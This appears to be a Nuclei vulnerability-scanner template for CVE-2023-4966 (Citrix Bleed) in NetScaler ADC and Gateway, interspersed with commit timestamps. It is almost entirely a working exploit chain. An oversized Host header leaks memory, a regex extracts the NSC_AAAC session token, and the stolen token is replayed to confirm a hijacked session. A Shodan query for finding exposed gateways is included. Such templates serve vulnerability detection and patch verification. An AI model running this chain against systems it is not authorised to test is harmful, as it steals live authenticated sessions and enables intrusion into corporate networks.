2023-10-24 10:58:04 +00:00
id : CVE-2023-4966
info :
name : Citrix Bleed - Leaking Session Tokens
author : DhiyaneshDK
2023-10-25 00:58:44 +00:00
severity : critical
2023-10-24 10:58:04 +00:00
description : |
Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.
reference :
- https://github.com/assetnote/exploits/blob/main/citrix/CVE-2023-4966/exploit.py
2023-10-25 11:56:09 +00:00
- https://github.com/Chocapikk/CVE-2023-4966
2023-10-24 10:58:04 +00:00
- https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966
- https://x.com/assetnote/status/1716757539323564196?s=20
- https://www.netscaler.com/blog/news/cve-2023-4966-critical-security-update-now-available-for-netscaler-adc-and-netscaler-gateway/
classification :
2023-10-25 00:58:44 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
cvss-score : 9.4
2023-10-24 10:58:04 +00:00
cve-id : CVE-2023-4966
cwe-id : CWE-119
epss-score : 0.00751
epss-percentile : 0.78895
cpe : cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
2023-10-24 11:45:08 +00:00
metadata :
verified : "true"
max-request : 1
shodan-query : title:"Citrix Gateway" || title:"Netscaler Gateway"
2023-10-25 00:58:44 +00:00
tags : cve,2023,citrix,adc,info-leak,kev
2023-10-24 10:58:04 +00:00
variables :
payload : '{{repeat("a", 24812)}}'
2023-10-24 22:35:46 +00:00
str : "{{to_lower(rand_text_alpha(4))}}"
2023-10-24 10:58:04 +00:00
http :
- raw :
- |+
GET /oauth/idp/.well-known/openid-configuration HTTP/1.1
2023-10-24 22:35:46 +00:00
{{str}} : {{Hostname}}
2023-10-24 10:58:04 +00:00
Host : {{payload}}
2023-10-25 00:47:10 +00:00
- |+
POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1
Host : {{Hostname}}
Cookie : NSC_AAAC={{session}}
User-Agent : python-requests/2.25.1
Accept-Encoding : gzip, deflate, br
Accept : */*
Connection : close
Content-Length : 0
2023-10-24 10:58:04 +00:00
unsafe : true
2023-10-25 00:47:10 +00:00
extractors :
- type : regex
name : session
part : body_1
group : 1
regex :
- \b([a-f0-9]{65})\b
internal : true
2023-10-25 11:56:09 +00:00
- type : regex
name : username
part : body_2
regex :
- '([a-z0-9]+)'
2023-10-24 10:58:04 +00:00
matchers-condition : and
matchers :
- type : word
2023-10-25 00:47:10 +00:00
part : body_1
2023-10-24 10:58:04 +00:00
words :
2023-10-24 11:45:08 +00:00
- 'NSC_AAAC='
2023-10-25 00:47:10 +00:00
- '{"issuer":'
2023-10-24 11:45:08 +00:00
condition : and
2023-10-24 10:58:04 +00:00
- type : word
2023-10-25 00:47:10 +00:00
part : header_2
2023-10-24 10:58:04 +00:00
words :
2023-10-25 00:47:10 +00:00
- "text/plain"
2023-10-25 12:03:42 +00:00
# digest: 490a0046304402206b88010a2d1a02c365cb12401504a9e62de490af30959e21e931045c7ad5161e02205a192bf94b1e1f93868c28bc865ed1acd5603b0a391b72229292f462888ac36a:922c64590222798bb761d5b6d8e72950